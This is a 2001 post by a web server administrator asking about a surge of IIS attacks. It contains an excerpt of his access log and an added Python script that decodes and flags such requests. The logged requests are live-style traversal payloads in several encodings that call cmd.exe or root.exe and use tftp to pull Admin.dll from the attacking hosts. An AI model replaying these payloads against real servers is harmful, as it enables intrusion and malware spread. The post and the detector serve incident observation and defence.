Hmm.  I've gotten 10,000 of them *today*.  Yesterday, none.

They're almost all from 66.12.* addresses (Verizon DSL in California, same
as me).  This is where most of my Code Red attacks are (still) coming
from, probably because there's a lot of people running IIS who aren't
really even aware of it.

I'm getting 10-20 hits a second of these attacks...

Is this just a resurgence of that old hack, or something new?

Here's a random sampling from the log file:
66.12.144.187 - - [18/Sep/2001:09:19:50 -0700] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:51 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:51 -0700] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:51 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.193.108%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:52 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.193.108%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:52 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.193.108%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:52 -0700] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.193.108 - - [18/Sep/2001:09:19:52 -0700] "GET /scripts/..%252f../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:52 -0700] "GET /scripts/..%c0%af../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:19:53 -0700] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20c:\Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:53 -0700] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:54 -0700] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:56 -0700] "GET /scripts/..%c1%9c../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:19:57 -0700] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20d:\Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:57 -0700] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:57 -0700] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:58 -0700] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:19:59 -0700] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:00 -0700] "GET /scripts/..%%35%63../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:00 -0700] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:01 -0700] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:01 -0700] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20e:\Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:01 -0700] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:02 -0700] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:02 -0700] "GET /scripts/..%%35c../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:03 -0700] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:03 -0700] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:04 -0700] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:04 -0700] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:05 -0700] "GET /scripts/..%25%35%63../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:05 -0700] "GET /d/Admin.dll HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:06 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:06 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:07 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:08 -0700] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.144.187 - - [18/Sep/2001:09:20:09 -0700] "GET /scripts/..%252f../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:09 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:14 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20c:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:18 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20d:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.192.10 - - [18/Sep/2001:09:20:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:22 -0700] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.106.36%20GET%20Admin.dll%20e:\Admin.dll
 HTTP/1.0" 200 158 "" ""
66.12.106.36 - - [18/Sep/2001:09:20:27 -0700] "GET /scripts/..%255c../Admin.dll 
HTTP/1.0" 200 158 "" ""
66.12.36.10 - - [18/Sep/2001:09:20:27 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 
200 158 "" ""
66.12.192.10 - - [18/Sep/2001:09:20:27 -0700] "GET 
/scripts/root.exe?/c+tftp%20-i%2066.12.192.10%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 
200 158 "" ""
66.12.36.10 - - [18/Sep/2001:09:20:30 -0700] "GET 
/scripts/root.exe?/c+tftp%20-i%2066.12.36.10%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 
200 158 "" ""



------------------------------------------
Rusty Brooks : http://www.rustybrooks.org/
    Spewing wisdom from every orifice
------------------------------------------
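
Added example, not part of the original post: the requests in the log sample above hide the same `/scripts/../../` traversal behind several encodings (`%c0%af`, `%c1%9c`, `%252f`, `%255c`, `%%35c`, `%%35%63`, `%25%35%63`), so a log triage script has to decode to a fixed point and fold overlong UTF-8 before matching. The function names, tag names and the sample lines (request strings as in the post, RFC 5737 addresses) are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# A two-byte UTF-8 sequence led by C0/C1 is an overlong encoding of an ASCII byte.
OVERLONG = re.compile(rb"[\xc0\xc1][\x80-\xbf]")
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

# Constructed sample in the shape of the log above (documentation addresses).
SAMPLE = r'''
192.0.2.10 - - [18/Sep/2001:09:19:50 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 158 "" ""
192.0.2.10 - - [18/Sep/2001:09:19:53 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
192.0.2.10 - - [18/Sep/2001:09:20:02 -0700] "GET /scripts/..%%35c../Admin.dll HTTP/1.0" 200 158 "" ""
192.0.2.11 - - [18/Sep/2001:09:20:03 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
192.0.2.11 - - [18/Sep/2001:09:20:09 -0700] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 158 "" ""
192.0.2.12 - - [18/Sep/2001:09:20:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 158 "" ""
192.0.2.13 - - [18/Sep/2001:09:20:30 -0700] "GET /index.html HTTP/1.0" 200 1043 "" ""
'''

def _fold(m):
    """Map an overlong pair such as C0 AF or C1 9C to the ASCII byte it encodes."""
    b0, b1 = m.group()
    return bytes([((b0 & 0x1F) << 6) | (b1 & 0x3F)])

def canonicalize(target, max_rounds=5):
    """Percent-decode until stable; return (canonical target, evasion tags)."""
    data, tags, rounds = target.encode("latin-1"), set(), 0
    for _ in range(max_rounds):
        step = unquote_to_bytes(data)
        if OVERLONG.search(step):
            tags.add("overlong-utf8")
            step = OVERLONG.sub(_fold, step)
        if step == data:
            break
        data, rounds = step, rounds + 1
    if rounds > 1:  # more than one decoding pass was needed
        tags.add("nested-encoding")
    return data.decode("latin-1").replace("\\", "/").lower(), tags

def scan(log_text):
    """Return {source_ip: sorted tags} for every flagged request in the log."""
    seen = defaultdict(set)
    for m in filter(None, map(LINE.match, log_text.splitlines())):
        canon, tags = canonicalize(m.group(2))
        path, _, query = canon.partition("?")
        checks = (("traversal", "../" in path),
                  ("shell-request", path.endswith(("/cmd.exe", "/root.exe"))),
                  ("tftp-fetch", "tftp" in query),
                  ("admin.dll-probe", path.endswith("/admin.dll")))
        tags |= {name for name, hit in checks if hit}
        if tags:
            seen[m.group(1)] |= tags
    return {ip: sorted(t) for ip, t in seen.items()}
```
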
